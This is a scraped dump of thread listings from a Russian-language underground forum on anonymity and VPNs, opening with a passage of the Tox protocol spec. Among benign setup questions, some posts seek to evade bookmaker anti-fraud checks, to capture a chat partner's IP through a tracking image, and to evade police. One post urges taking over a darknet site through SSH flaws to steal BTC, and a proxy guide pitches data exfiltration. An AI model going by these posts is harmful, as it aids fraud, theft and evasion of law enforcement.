Приемник сохраняет пакеты и отбрасывает второй пакет с номером 2, у него есть: 0, 2, 3 в его буфере. Он передаст первый пакет соответствующему модулю и удалит его из массива, но поскольку пакет с номером 1 отсутствует, он остановится на этом. Содержимое буфера теперь: 2, 3. Получатель знает, что пакет номер 1 отсутствует, и запросит его у отправителя с помощью пакета запроса пакетов:

идентификаторы данных:

ID| Data
---|---
0| padding (skipped until we hit a non zero (data id) byte)
1| packet request packet (lossy packet)
2| connection kill packet (lossy packet)
...| ...
16+| reserved for Messenger usage (lossless packets)
192+| reserved for Messenger usage (lossy packets)
255| reserved for Messenger usage (lossless packet)

Пакеты отключения соединения сообщают другому, что соединение разорвано.
Номера пакетов — это первый байт данных в пакете.
пакет запроса пакета

[uint8_t (1)][uint8_t num][uint8_t num][uint8_t num]...[uint8_t num]

Пакеты запроса пакетов используются одной стороной соединения для запроса пакетов у другой. Чтобы создать полный пакет запроса пакетов, запрашивающий берет номер последнего пакета, который был обработан (отправлен в соответствующий модуль и удален из массива (0 в примере выше)). Из этого номера вычитается номер первого пропущенного пакета (1 - 0) = 1. Это означает, что полный пакет для запроса пакета с номером 1 будет выглядеть так:

[uint32_t 1]

[uint32_t 0]

[uint8_t 1][uint8_t 1].

Если запрашивался также пакет номер 4, возьмем разницу между номером пакета и номером последнего запрашиваемого пакета (4 - 1) = 3. Таким образом, пакет будет выглядеть следующим образом:

[uint32_t 1]

[uint32_t 0]

[uint8_t 1][uint8_t 1][uint8_t 3].

Но что если число больше 255? Допустим, пиру необходимо запросить пакеты 3, 6, 1024, пакет будет выглядеть следующим образом:

[uint32_t 1]

[uint32_t 2]

[uint8_t 1][uint8_t 3][uint8_t 3][uint8_t 0][uint8_t 0][uint8_t 0][uint8_t 0][uint8_t 253].

Каждый 0 в пакете представляет собой прибавление 255 до тех пор, пока не будет достигнут байт, не содержащий 0, который затем прибавляется, и в результате получается запрашиваемое число.
Этот запрос разработан для того, чтобы быть небольшим при запросе пакетов в реальных сетевых условиях, где запрашиваемые номера пакетов будут близки друг к другу. Поместить каждый запрашиваемый номер пакета в 4 байта было бы очень просто, но это сделало бы пакеты запроса неоправданно большими, поэтому пакеты выглядят следующим образом.
Когда пакет запроса получен, он будет декодирован, а все пакеты, находящиеся между запрошенными пакетами, будут считаться успешно полученными другой стороной.
Пакеты запроса пакетов отправляются по крайней мере каждые 1 секунду в toxcore и чаще, когда пакеты принимаются.
В настоящее время используется следующая формула (обратите внимание, что эта формула, скорее всего, неоптимальна):

REQUEST_PACKETS_COMPARE_CONSTANT = 50.0 double request_packet_interval =.

(REQUEST_PACKETS_COMPARE_CONSTANT /

(((double)num_packets_array(&conn->recv_array) + 1.0) / (conn->packet_recv_rate

+ 1.0)));

**num_packets_array( &conn->recv_array) **возвращает разницу между наибольшим номером полученного пакета и последним обработанным. В коде toxcore она относится к общему размеру текущего массива (с дырами, которые являются заполнителями для еще не полученных пакетов, которые заведомо отсутствуют).
conn- >packet_recv_rate - количество успешно принятых пакетов данных в секунду.

Эта формула была создана с учетом логики, что чем выше "задержка" в пакетах (num_packets_array(&conn->recv_array)) по сравнению со скоростью получения пакетов, тем больше пакетов запроса должно быть отправлено.
Запрошенные пакеты отправляются каждый раз, когда они могут быть отправлены, т.е. они будут подчиняться контролю перегрузки и не обходить его. Они отправляются один раз, последующие пакеты запроса будут использоваться, чтобы узнать, был ли пакет получен или его следует отправить повторно.
Пинг или rtt (round trip time) между двумя пирами можно рассчитать, сохранив время отправки каждого пакета и взяв разницу между временем отправки последнего пакета, подтвержденного пакетом запроса, и временем получения пакета запроса. rtt может быть рассчитан для каждого пакета запроса. Наименьший из них (для всех пакетов) будет наиболее близок к реальному пингу.
Этот ping или rtt может быть использован для того, чтобы узнать, следует ли повторно отправить пакет запроса, который запрашивает только что отправленный пакет, или нужно подождать следующего (чтобы узнать, успела ли другая сторона получить пакет).
Алгоритм управления перегрузкой имеет цель определить, сколько пакетов может быть отправлено по каналу связи каждую секунду, прежде чем ни один из них больше не будет отправлен. Принцип его работы заключается в том, чтобы отправлять пакеты все быстрее и быстрее, пока ни один из них не сможет пройти через канал, а затем прекратить отправлять их быстрее.
В настоящее время управление перегрузками использует следующую формулу в toxcore, однако это, вероятно, не самый лучший способ.
Текущая формула состоит в том, чтобы взять разницу между текущим размером очереди отправки и размером очереди отправки 1,2 секунды назад, взять общее количество пакетов, отправленных за последние 1,2 секунды, и вычесть из него предыдущее число.
Затем разделите это число на 1,2, чтобы получить скорость передачи пакетов в секунду. Если эта скорость меньше минимальной скорости отправки 8 пакетов в секунду, установите значение 8.
Событие перегрузки можно определить как событие, когда количество запрошенных пакетов превышает количество пакетов, которые, по мнению системы управления перегрузками, могут быть отправлены в данном кадре. Если событие перегрузки произошло в течение последних 2 секунд, скорость отправки пакетов соединения устанавливается равной скорости отправки, рассчитанной ранее, если нет, она устанавливается равной этой скорости отправки, умноженной на 1,25, чтобы увеличить скорость.
Как я уже сказал, это не идеально, и, вероятно, можно найти лучшее решение или подкорректировать цифры.
Для устранения возможной проблемы, когда невозможно отправить данные с низкой пропускной способностью, такие как текстовые сообщения, при отправке данных с высокой пропускной способностью, таких как файлы, можно сделать так, чтобы приоритетные пакеты полностью игнорировали контроль перегрузки, помещая их в очередь пакетов отправки и отправляя их, даже если контроль перегрузки говорит не делать этого. Это используется в toxcore для всех пакетов, не связанных с передачей файлов, чтобы предотвратить передачу файлов, мешающую отправке обычных пакетов сообщений.

Обход HTTP/3

ID: 676533bbb4103b69df371a4e
Thread ID: 90750
Created: 2023-06-17T16:03:33+0000
Last Post: 2023-06-18T11:58:40+0000
Author: Dank Team
Replies: 6 Views: 312

Всем привет! Возник такой вопрос. Скажем так, есть некий линк, букмекерская контора Европы. В последнее время при регистрации новорегов, начинает блочить аккаунты, причем безвозмездно. Менял носки, в данный момент юзаю антик окто. Т.е протокол HTTP/3 палит то, что я сижу через антик и банит мои аккаунты. Как можно решить эту проблему и можно ли вообще обойти этот фрод? какие есть способы? спасибо!

X-Forwarded-For HTTP Header (Tor)

ID: 676533bbb4103b69df371b2b
Thread ID: 64478
Created: 2022-03-19T01:38:35+0000
Last Post: 2022-03-31T05:09:01+0000
Author: UnknownDeath
Replies: 9 Views: 310

[EN] Not 100% sure if this is the best part of the forum to ask this on however as it is a proxy + Tor related issue I decided to ask here in both English and Russian to get more repsonces. I've encountered a Tor hidden service which is used to index Illict marketplaces such a World Market or Dark0de Reloaded but this site in general has a very odd HTTP Header I've never encountered while dealing with any hidden service: X-Forwarded-For: 50.xxx.xxx.xxx which to me is confusing. I did some digging and the IPv4 address is within the US and is listed on shodan.io as a "Database" which is very odd. Typically a proxy wouldn't be marked as a "Database" but whatever. If someone who works with Tor or knows about this topic I'm willing to disclose the Hidden Service & IPv4 of the hidden service.

If you manage to control the website through SSH & Modify the website it will be possible to gain tons of BTC Very quickly as it does aide have deposits enabled so your choice to rob it or not however I'd advise turning it over, You'd make a ton of legitment income quickly at the expense of shutting down a very good service to 10s to 100s of thousands of people.

There is several SSH Vulnerabilities on the site so it may or may not be exploitable still.

[RU]
Не на 100% уверен, что это лучшая часть форума, чтобы задать этот вопрос, однако, поскольку это проблема, связанная с прокси + Tor, я решил спросить здесь на английском и русском языках, чтобы получить больше ответов. Я столкнулся со скрытой службой Tor, которая используется для индексации незаконных торговых площадок, таких как World Market или Dark0de Reloaded, но в целом этот сайт имеет очень странный HTTP-заголовок, с которым я никогда не сталкивался при работе со скрытой службой: X-Forwarded-For. : 50.xxx.xxx.xxx, что меня сбивает с толку. Я немного покопался, и адрес IPv4 находится в США и указан на shodan.io как «база данных», что очень странно. Обычно прокси не помечается как «База данных», но что угодно. Если кто-то, кто работает с Tor или знает об этой теме, я готов раскрыть скрытую службу и IPv4 скрытой службы.

Если вам удастся управлять веб-сайтом через SSH и изменить веб-сайт, вы сможете очень быстро получить тонны BTC, так как он поддерживает депозиты, так что ваш выбор, грабить его или нет, однако я бы посоветовал перевернуть его. d сделать тонну легитимного быстрого дохода за счет закрытия очень хорошего сервиса для от 10 до 100 тысяч человек.

На сайте есть несколько уязвимостей SSH, поэтому он может быть или не быть эксплуатируемым.

VPN сервер на docker за 5 минут

ID: 676533bbb4103b69df371a3a
Thread ID: 93062
Created: 2023-07-16T05:14:42+0000
Last Post: 2023-07-16T05:14:42+0000
Author: g-man-original
Prefix: Мануал/Книга
Replies: 0 Views: 307

Есть куча мануалов как установить VPN сервер, но все мануалы для различных операционных систем, для различных версий. Где-то работает, где-то нет. Сегодня мы рассмотрим универсальный способ с помощью контейнера на базе docker.

Скачиваем исходники

Bash:Copy to clipboard

git clone https://github.com/kylemanna/docker-openvpn.git cd docker-openvpn/ docker build -t myownvpn .

Создаем хранилище для конфигов и настроек

Bash:Copy to clipboard

cd ~ mkdir vpn-data && touch vpn-data/vars

Настройка конфига
docker run -v $PWD/vpn-data:/etc/openvpn --rm myownvpn ovpn_genconfig -u udp://IP_ADDRESS:3000
IP_ADDRESS заменяем на ip сервера, и порт заменить на свой любой. Так же если вы заменяете тут то нужно и в командах ниже.

Настройка шифорвания
docker run -v $PWD/vpn-data:/etc/openvpn --rm -it myownvpn ovpn_initpki

Запускам наш VPN
docker run -v $PWD/vpn-data:/etc/openvpn -d -p 3000:1194/udp --cap- add=NET_ADMIN myownvpn
1194 порт менять не надо, это внутренний порт внутри контейнера.

Работа с пользователями

Добавляем пользователя
docker run -v $PWD/vpn-data:/etc/openvpn --rm -it myownvpn easyrsa build- client-full [B][I]user1[/I][/B] nopass

Сохраняем его конфиг, чтобы можно было скачать
docker run -v $PWD/vpn-data:/etc/openvpn --rm myownvpn ovpn_getclient user1 > user1.ovpn

У меня все, безопасной вам работы

Поток корреляционных атак на Tor Onion Service Sessions с помощью скользящей суммы подмножества

ID: 676533bbb4103b69df371985
Thread ID: 109852
Created: 2024-03-06T20:38:03+0000
Last Post: 2024-03-27T21:50:23+0000
Author: weaver
Prefix: Мануал/Книга
Replies: 1 Views: 306

Flow Correlation Attacks on Tor Onion Service Sessions with Sliding Subset

Sum

Описание

Tor — одна из самых популярных сетей анонимности, используемых сегодня. Его способность защищаться от атак с корреляцией потоков важна для обеспечения надежных гарантий анонимности. Однако осуществимость атак с корреляцией потоков на луковые сервисы Tor (ранее известные как «скрытые сервисы») остается открытым вопросом. В этой статье мы представляем эффективную атаку с корреляцией потоков, которая может деанонимизировать сеансы луковых служб в сети Tor. Наша атака основана на новом распределенном методе под названием Sliding Subset Sum (SUMo), который может быть развернут группой сговорившихся интернет-провайдеров по всему миру федеративным образом. Эти интернет-провайдеры собирают трафик Tor в нескольких точках сети и анализируют его с помощью конвейерной архитектуры, основанной на классификаторах машинного обучения и новой функции сходства, основанной на классической задаче определения суммы подмножества. Эти классификаторы позволяют SUMo эффективно и результативно деанонимизировать сеансы луковых сервисов. Мы также анализируем возможные контрмеры, которые сообщество Tor может принять, чтобы снизить эффективность этих атак.

Click to expand...

![www.ndss-symposium.org](/proxy.php?image=https%3A%2F%2Fwww.ndss- symposium.org%2Fwp- content%2Fuploads%2FNDSS_Logo_RGB.jpg&hash=154edd2da82c06e52a83043d2ccaa73d&return_error=1)

[ Flow Correlation Attacks on Tor Onion Service Sessions with Sliding

Subset Sum - NDSS Symposium ](https://www.ndss-symposium.org/ndss-paper/flow- correlation-attacks-on-tor-onion-service-sessions-with-sliding-subset-sum/)

![www.ndss-symposium.org](/proxy.php?image=https%3A%2F%2Fwww.ndss- symposium.org%2Fwp-content%2Fuploads%2Fcropped- NDSS_512x512-32x32.png&hash=b851b77491c1b12e3c45903d1447dc11&return_error=1) www.ndss-symposium.org

Подробнее тут

https://www.ndss-symposium.org/wp-content/uploads/2024-337-paper.pdf

Вопрос безопасности. LiveUSB vs Виртуалка?

ID: 676533bbb4103b69df371a15
Thread ID: 97038
Created: 2023-09-01T07:06:15+0000
Last Post: 2023-09-01T17:50:18+0000
Author: xlokimean
Replies: 3 Views: 306

Что лучше юзать:
комп c Double VPN - VM Linux с double VPN - VPS с впн
или
комп c Double VPN - LiveUSB Linux с double VPN - VPS с впн?

Как делать звонки анонимно и безопасно?

ID: 676533bbb4103b69df3719da
Thread ID: 103193
Created: 2023-11-29T11:13:03+0000
Last Post: 2023-11-30T06:12:10+0000
Author: alexxs
Replies: 2 Views: 306

Ваше мнение как делать звонки анонимно и безопасно? Кто какими связками пользуется? Что на счет звонков в телеграм?

Shadowsocks proxy и openvpn (на android)

ID: 676533bbb4103b69df3719f1
Thread ID: 100671
Created: 2023-10-22T21:33:42+0000
Last Post: 2023-10-29T21:24:33+0000
Author: mrveryclever
Replies: 1 Views: 305

Всем привет. Поставил на android приложение для подключения к shadow socks shadowsocks app. Затем поставил специально настроенные на работу через мосты конфиги openvpn, через стандартное приложение Openvpn. Сначала подключаюсь к shadow соксам, затем включаю впн и все работает. Но когда включаю стандартную для впн на телефоне настройку Always-on VPN и Block connections without VPN, что является встроенной функцией kill switch в каждом новом андроиде, shadow соксы сразу отрубаются. Получается чтобы обойти ценузуру надо отключить kill switch. Соответственно реальный IP может быть слит в сеть. Есть кто-нибудь кто сталкивался с этой проблемой?
Заранее благодарю за ответы!

Go-MultiTor Router

ID: 676533bbb4103b69df3719e2
Thread ID: 102491
Created: 2023-11-18T13:46:40+0000
Last Post: 2023-11-20T16:38:17+0000
Author: Tr3kzzz
Replies: 1 Views: 301

Go-MultiTor
А также его аналог в котором можно задать количество процессов tor: metasocks
Если быть совсем умным, можно использовать embed и внутри metasocks разместить бинарник tor и всё держать в памяти.

Просто оставлю это тут полежать, вдруг кто себе роутер захочет собрать)

tor + socks

ID: 676533bbb4103b69df371abb
Thread ID: 72960
Created: 2022-09-09T17:50:50+0000
Last Post: 2022-09-13T18:12:20+0000
Author: MisterNobody
Replies: 6 Views: 301

Всех приветствую! Нужна помощь в настройке socks поверх тора на Whonix'e. Пробовал через foxyproxy, но либо не проходит соединение, либо палится сам тор браузер. Сам имею поверхностное понимание этого всего, поэтому и интересуюсь у гуру. Буду благодарен за конструктив

Вопрос по куки и истории серфа

ID: 676533bbb4103b69df371ab7
Thread ID: 73383
Created: 2022-09-19T12:50:25+0000
Last Post: 2022-09-22T16:25:27+0000
Author: Uservice
Replies: 9 Views: 301

Доброго дня, форумчане!
С недавнего времени заметил на Мозиле следующую странность:
Пользуюсь браузером в приватном окне; в настройках стоит чистка истории и кук при закрытии окна; стоит запрет на сохранение данныхдополнительно чищу куки, кеш, данные сайтов и историю просмотров в настройках приватности и защиты. Однако после всех чисток в браузере остается история посещения некоторых сайтов; на одном из сайтов и вовсе остается логин (хотя в настройках выключено сохранение логинов и паролей) и при чистке они по идее удаляются ( в исключениях нет данных о сайте).
Буквально неделю назад такого не было.
Браузер использую без учетной записи.
Сегодня заметил что и в Гугл осталась история посещения сайтов, хотя также почистил все куки и историю и также настройками запрещено сохранять данные.
Прошу помощи у знающих найти ответ, как же избавляться от данных, т.к даже переустановка браузера (пробовал ток на Мозиле) не дает результат. ОС MacOS

How to use Putty as a SOCKS Proxy

ID: 676533bbb4103b69df371909
Thread ID: 126715
Created: 2024-11-12T02:50:20+0000
Last Post: 2024-11-12T02:50:20+0000
Author: Deltaplan
Prefix: Мануал/Книга
Replies: 0 Views: 299

[![](/proxy.php?image=https%3A%2F%2Fwww.pwndefend.com%2Fwp- content%2Fuploads%2F2021%2F02%2Fhacking101-730x350.png&hash=12d26a8276be3f0a8d5df4cab43382cd)](https://www.pwndefend.com/2022/06/25/how- to-use-putty-as-a-socks- proxy/)Guides

Ever stuck in an environment where your internet access isn’t what you want it to be? Ever need to exfilrate data and bypass some DLP? Obviously I’m talking like a pentester (don’t use this if it beaks policies on anohers assets) so this is useful for some scenarios in testing but also in real life!

How to Guide

Run Putty

Configure an SSH Session 1. OPSEC note, if you save the session it leaves evidence, might sound obvious but you know fingerprints are real! 2.

Goto SSH > Tunnels and configure as required

Key point here is to use DYNAMIC for destination and to configure a source PORT e.g., 1337 (TCP)

Finaly when you are happy with the configuration click Add

Now connect to the SSH Server

Reconfigure your browser/system to use the SOCKS5 proxy 127.0.0.1:1337

Browse the internet

You can use a service like https://ipinfo.io to check your ip address.

You can also use PLINK!

https://www.chiark.greenend.org.uk/~sgtatham/putty/

Remember a SOCKS proxy works with TCP and UDP (works for DNS etc) so you can use them to pivot around networks as well as evade traffic controls (in some instances).

© https://www.pwndefend.com/2022/06/25/how-to-use-putty-as-a-socks-proxy/

P.S.

Баян конечно, но вдруг кто не знал ещё.

Возможно ли сделать картинку-трекер для мессенджеров? Отслеживание картинки.

ID: 676533bbb4103b69df371b11
Thread ID: 66363
Created: 2022-04-29T23:52:28+0000
Last Post: 2022-05-12T11:51:01+0000
Author: dz15ml
Replies: 2 Views: 298

Возможно ли сделать картинку-трекер для мессенджеров, что-бы узнать IP-адрес (и ОС) собеседника. Внимание - без ссылковый вариант. Только картинка.
В частности для телеги.
Например, я говорил с кем-то в телеге и отправил ему некую приватную картинку, а потом он отослал её дальше без ведома. Нужно отслеживать. Возможно ли это, и как сделать?

Введение в Docker. Принцип работы Docker-контейнеров

ID: 676533bbb4103b69df371a18
Thread ID: 97017
Created: 2023-08-31T19:13:28+0000
Last Post: 2023-08-31T20:46:19+0000
Author: Knew100
Prefix: Статья
Replies: 5 Views: 298

Во многих моих инструкциях часто упоминалось такое средство, как Docker и Docker-контейнеры. В данной статье я хотел бы объяснить, что это такое и как это работает.

Docker - это платформа для разработчиков, позволяющая создавать, отправлять и запускать приложения в контейнерах.
Контейнер - это легкий, автономный исполняемый пакет, который содержит все необходимое для запуска приложения, включая код, библиотеки, зависимости и конфигурации. Контейнеры Docker изолированы от хост-системы и других контейнеров, что делает их более безопасными и надежными.

Контейнеры Docker работают с использованием многоуровневой файловой системы и пространств имен ядра для создания виртуальной среды для приложений. Каждый контейнер работает в собственном пространстве имен, что означает, что он имеет собственное представление о файловой системе, сети и других системных ресурсах. Контейнеры могут взаимодействовать друг с другом через общий сетевой интерфейс или с помощью механизмов межпроцессного взаимодействия.

Когда вы создаете контейнер Docker, вы начинаете с указания базового образа. Этот базовый образ служит основой для вашего контейнера и включает в себя операционную систему и другие программные компоненты. Затем вы можете добавить код приложения, зависимости и конфигурации поверх этого базового образа.

Создав контейнер, вы можете запустить его на любой машине, на которой установлен Docker. Docker использует многоуровневую файловую систему для хранения контейнера и всех его зависимостей, что означает, что вам нужно загружать только те части контейнера, которые изменились с момента его последней сборки.

Docker также использует пространства имен ядра для обеспечения изолированной среды для запуска контейнера. Каждый контейнер работает в своем собственном пространстве имен, что означает, что он имеет собственное представление о файловой системе, сети и других системных ресурсах. Такая изоляция делает контейнеры Docker более безопасными и менее подверженными вмешательству других процессов.

Так же, вы можете найти готовые Docker-контейнеры с различными приложениями на сайте Docker Hub https://hub.docker.com/

Преимущества Docker:

Контейнеры могут работать на любой машине, поддерживающей Docker, независимо от базовой операционной системы или аппаратного обеспечения.

Контейнеры можно легко увеличивать или уменьшать, что делает их идеальными для использования в средах облачных вычислений.

Контейнеры легкие и быстрые, что означает, что их можно быстро запустить и свернуть. Это позволяет разработчикам быстрее тестировать свои приложения.

Контейнеры гарантируют, что приложение будет работать одинаково во всех средах, что снижает вероятность ошибок и проблем с конфигурацией.

Контейнеры изолированы друг от друга и от основной системы, что делает их более безопасными и менее подверженными вмешательству других процессов.

Установить Docker под различные ОС можно по инструкциям с официального сайта Docker - https://docs.docker.com/engine/install/

Как устроена безопасность теневых сервисов

ID: 676533bbb4103b69df371b85
Thread ID: 58367
Created: 2021-10-31T07:58:06+0000
Last Post: 2021-10-31T07:58:06+0000
Author: termie707
Replies: 0 Views: 298

Такой вопрос уважаемые , как устроена ( в деталях ) безопасность на примере владельцев hydra , требовалось ли им что-то дополнительное не ординарное , и в чем различие настройки безопасности простых селлеров на такой площадке , от владельцев? Всем спасибо за участие

зы: Вопрос касается только сети , вопросы безопасности поведения и личности считать достигнутыми

Tools in case of internet isolation

ID: 676533bbb4103b69df3719e9
Thread ID: 102094
Created: 2023-11-11T21:05:48+0000
Last Post: 2023-11-12T12:31:23+0000
Author: TCG
Replies: 3 Views: 298

1. OnionCat → (https://www.onioncat.org/) ← a fairly high-quality anonymous VPN adapter. With it, you can connect two or more devices through VPN tunnels.
2. Tribler → (https://www.tribler.org/download.html) ← With this torrent client you can download files through a chain of intermediary servers. Something similar to the Tor network.
3. PSIPHON → (https://www.psiphon3.com/) ← is a very comprehensive tool designed to bypass Internet censorship.
4. Orchid → (https://www.orchid.com/) ← reliable new generation VPN service. It uses blockchain technology and smart contracts.
5. Lantern → (https://getlantern.org/ru_RU/index.html) ← a pool of various proxies to bypass Internet censorship.
6. Censor Tracker → (https://censortracker.org/) ← extension for Chrome, which allows you to bypass Internet censorship in the Russian Federation.
7. SnowFlake → (<https://support.torproject.org/ru/censorship/how-can-i-use- snowflake/>) ← Tor bridge that works right in your browser.
8. Magic Wormhole → (https://magic-wormhole.readthedocs.io/en/latest/) ← A handy utility for transferring files between devices directly.
9. FireChat → (https://firechat.en.uptodown.com/android) ← an interesting offline messenger.

Twitter and TOR?

ID: 676533bbb4103b69df371b26
Thread ID: 64228
Created: 2022-03-14T07:55:09+0000
Last Post: 2022-04-03T13:00:40+0000
Author: tuyvor
Replies: 3 Views: 294

Don't know what to think about it: is it fake?

https://twitter3e4tixl4xyajtrzo62zg5vztmjuricljdp2c5kshju4avyoid.onion/

Session мессенджер, обсуждение

ID: 676533bbb4103b69df371a45
Thread ID: 92217
Created: 2023-07-06T10:16:28+0000
Last Post: 2023-07-06T12:27:12+0000
Author: Stupor
Replies: 2 Views: 294

Приложение к моей небольшой статье: Утренний кофе для ПК

Хочу всех Уважаемых местных жителей предостеречь и кое что посоветовать.

Про мессенджеры и не только, про человескую тупость и тоже не только об этом...

Итак после слива АНБ за приличную сумму уязвимостей TOX,
(хотя бесит, что он тот самый TOX вроде опенсорц). Что мы имеем на сегодня?
На сегодня мы имеем очень интересный мессенжер Session

На чем же основан он? Читаем на оф сайте: Session
Надеюсь понятно, что там тот же АНБэшный Tor, как обычно говорят про выходные ноды, но суть не важно
самое еще интересное что он дает до 4-х нод по цепочке. Это не важно тоже.

Все же мы его использовать. Будем по нескольким причинам:
1. На входе мы используем свой VPN (платный , желательно DobleVPN + TOR
2. Действительно наш платный и проверенный VPN должен естественно использовать полное шифрование, включая DNS см https://xss.is/threads/81875/page-3#post-621088
3. Передавать свой Session ID только я уж хз, но чтобы чел знал подробности личного общения.
Проблемка и минус для школоло, но норм для профи:
- вложение денег на платный (в моем случае) doubleVPN,
- естественно тайминги на TOR.
- чел с кем общаетесь должен тоже быть не идиотом и иметь те же финтифлюшки.
Если ктото будет говорить, что проще сервант свой завести - поверьте это чушь, ложь и дорого, имхо придется фастфлюксы и не один сервант иметь. Tor как ни странно но рулит еще, пока
железяки еще до 2026 года будут чисто майнить битки, потом переключатся на хеши мессенджеров и все мы влипнем как мухи на клейкую ленту

SSH Tunnels - GetSSH

ID: 676533bbb4103b69df371ac7
Thread ID: 72160
Created: 2022-08-24T05:53:15+0000
Last Post: 2022-08-26T09:50:42+0000
Author: nakedpoet
Replies: 4 Views: 293

Old Tool - Still Working

DOWNLOAD LINK :- https://mega.nz/file/7ltkhCzQ#ruhAIVpMUxrJRgqfFzUYob2qJ-67-6Fp3phinqpiM8E

CLEAN - NO BACKDOOR

помогите с серверной частью wireguard .

ID: 676533bbb4103b69df371aa8
Thread ID: 74116
Created: 2022-10-09T07:00:51+0000
Last Post: 2022-10-15T11:42:47+0000
Author: asddddd
Replies: 8 Views: 293

Хочу поднять свой впн на wireguard, но выдает ошибку конфига, приложил скрины ниже. Делал по гайдам, должно все работать

VPN - a Very Precarious Narrative

ID: 676533bbb4103b69df371a40
Thread ID: 92404
Created: 2023-07-08T17:28:13+0000
Last Post: 2023-07-08T17:28:13+0000
Author: socket
Prefix: Статья
Replies: 0 Views: 292

Are you totally depend on VPN? You need to re-born.

VPN - [Very Precarious Narrative](https://overengineer.dev/blog/2019/04/08/very-precarious- narrative.html)

Безопасность и анонимность на Android

ID: 676533bbb4103b69df371b1e
Thread ID: 65867
Created: 2022-04-19T19:28:11+0000
Last Post: 2022-04-25T22:41:42+0000
Author: NightRaydsOsnova
Replies: 1 Views: 290

Приветствую! Сегодня я вам расскажу как сделать ваш телефон, более менее безопасным и анонимным для работы. Гайд был создан для начинающих, в принципе как и я.

Тебе нужно перепрошить на Lineage OS или CalyxOS, и разблокировать загрузчик и прошить TWRP recovery, и из него прошить свою прошивку и Magisk (для Рут), и потом скачать AFWall+, AppOpsX, Orbot и в AFWall+ запрещаешь всем приложениям доступ в инет кроме орбота и f-droid (магазин свободных приложений, надо будет скачать). После этого весь твой трафик будет идти через тор, приложение(стучит в интернет) - Тор - целевой сервер, т.е. тор будет посредником, еще нужно скачать shelter ( Она создаёт отдельное хранилище для приложения). Кто-то не советует ставить крипто кошелёк на телефоне, но если нужно тогда советую Samourai Wallet. Можно записать на листе парольную фразу и 12 слов восстановления. Sim лучше купить eSim если устройство его поддерживает поддерживает, можно купить здесь https://silent.link/ , покупаем eSim и зачисляем кредит на счёт, оплатив его биткоинами. Импортируем eSIM в устройство , и теперь у нас совершенно анонимный доступ к мобильной сети по всему миру.

Дополнительно (способ легче):
Поставить прошивку Lineage OS и пропустить весь трафик системы через тор с помощью программы InviZible (для этого нужен рут) + не использовать сим карту и гугл сервисы.

Но все же лучшей анонимности юзера компьютер с Linux. Жду от вас критику.

cyberyozh, обсуждение

ID: 676533bbb4103b69df371a64
Thread ID: 87393
Created: 2023-05-06T16:31:20+0000
Last Post: 2023-05-06T17:43:14+0000
Author: magic
Replies: 1 Views: 289

Недавно решил прочитать по приколу cyberyozh, вдруг встречу чо-нить полезное. Некоторые моменты немного смутили.

Например в статье, [деанон VPN](https://book.cyberyozh.com/ru/deanonimizatsiya-polzovatelej-vpn-i-proxy- putem-sopostavleniya-soedinenij/) описывается деанон путем сопоставления соединений.
Часто ли деанонят хакеров в России таким способом? Есть ли смысл здесь параноить?

Допустим в другой стране(нейтральная страна. Египет, Турция, Германия) началось полицейское дело. Все что у них есть - IP адресса, среди которых IP моего абузоустойцевого VPS, например в Нидерландах, и факты, указывающего на источник из России. VPS оплачен за монеро и логи убраны. Перейдет ли оно в Россию? Насколько это дело должно быть серьезным, чтобы они обратились в Россию?

Есть еще статья: [маячки](https://book.cyberyozh.com/ru/cross-device-tracking- deanonimizatsiya-polzovatelej-tor-vpn-proxy-pri-pomoschi-zvukovyih-mayachkov/)
Это уже похоже на фантастику, особенно в России. Или нет?

Создаём собственную сеть конфиденциальности через Интернет.

ID: 676533bbb4103b69df371988
Thread ID: 111377
Created: 2024-03-26T17:43:58+0000
Last Post: 2024-03-26T17:55:57+0000
Author: Center for Finance
Replies: 2 Views: 287

Project V — это набор инструментов, которые помогут вам создать собственную сеть конфиденциальности через Интернет.

Ядро проекта V с именем V2Ray отвечает за сетевые протоколы и коммуникации. Он может работать самостоятельно, а также сочетаться с другими инструментами.

Nethunter OpSec

ID: 676533bbb4103b69df371b0f
Thread ID: 66410
Created: 2022-05-01T06:08:50+0000
Last Post: 2022-05-19T14:37:13+0000
Author: Nyrid
Replies: 1 Views: 285

Hello there,

I am user of Linux ( debian 11 ) on my local computer but I get phone ( Samsung A40 ) which I was flash ( TWRP ) and root after that I was install custom rom ( crDroidAndroid-11.0 ) without gapps and google,after that I download Nethunter ( apk ) and chroot ( full ) and make success installation so....

Now i have Nethunter almost full working Linux ( only main problem I have with aarch64 because most app works with arm64 and etc )
now i am paranoid about Google

because Google was developed android and custom rom what I use can be ( i think ) controlled or checking with Google
so my question is about OpSec ( i use VPN + TOR ) ( mac adress set to random )

i wanted rom like CalyxOS,GrapheneOS and etc secures,privacy rom but unlucky for me ( Samsung A40 ) is not supported
also I want ask about its possible to see ( IMEI,SERIAL NUMBER ) when i browse ? because i think only mac,canvas,webRTC,dns and etc

thats all what I want know for now so promise my bad English language
also I am not experienced like You guys and I learn something new every day

DNS сервер, обсуждение, анонимность

ID: 676533bbb4103b69df3719b4
Thread ID: 107185
Created: 2024-02-01T02:34:57+0000
Last Post: 2024-02-01T02:48:48+0000
Author: testerov
Replies: 2 Views: 285

Доброго времени суток, на данный момент использую "Dnscrypt" это надежно? или же лучше поставить на систему какой-то "opendns"?

Не работает Remote Desktop Connection при VPN

ID: 676533bbb4103b69df371af6
Thread ID: 69631
Created: 2022-07-04T11:46:07+0000
Last Post: 2022-07-06T10:26:14+0000
Author: WillBeRich
Replies: 7 Views: 285

В Windows включен VPN (средствами самой Windows, не сторонний софт), при попытке подключиться к дедику - ошибка, невозможно подключиться. Причем при отключенном VPN проблем не возникает. Куда копать и что делать?

Какие ip вы юзаете для взломов?

ID: 676533bbb4103b69df371ad1
Thread ID: 72038
Created: 2022-08-21T20:14:36+0000
Last Post: 2022-08-21T20:41:00+0000
Author: Pulp Fiction
Replies: 3 Views: 283

Прямо с тора? Или своего впн? Или соксы юзаете? Или с дедиков? Или как то ещё?

IQ-Openvpn или Openvpn с распределенной маршрутизацией

ID: 676533bbb4103b69df371a4a
Thread ID: 91532
Created: 2023-06-27T20:30:11+0000
Last Post: 2023-06-27T20:30:11+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 283

C каждым днем все больше и больше людей узнают, что такое VPN, и начинают им пользоваться, но зачастую все сталкиваются с такой проблемой, что включая VPN мы получаем доступ к заблокированным ресурсам, но в тоже время теряем доступ к ресурсам, которые закрывают свой доступ из других локаций по тем или иным причинам. По этой причине приходится постоянно выключать VPN. В данном мане я расскажу, как поднять свой VPN сервис, который позволит получать доступ ко всем ресурсам в интернете не отключаясь от VPN‑сервера.

Для создания нам надо два сервера VPN1 и VPN2.

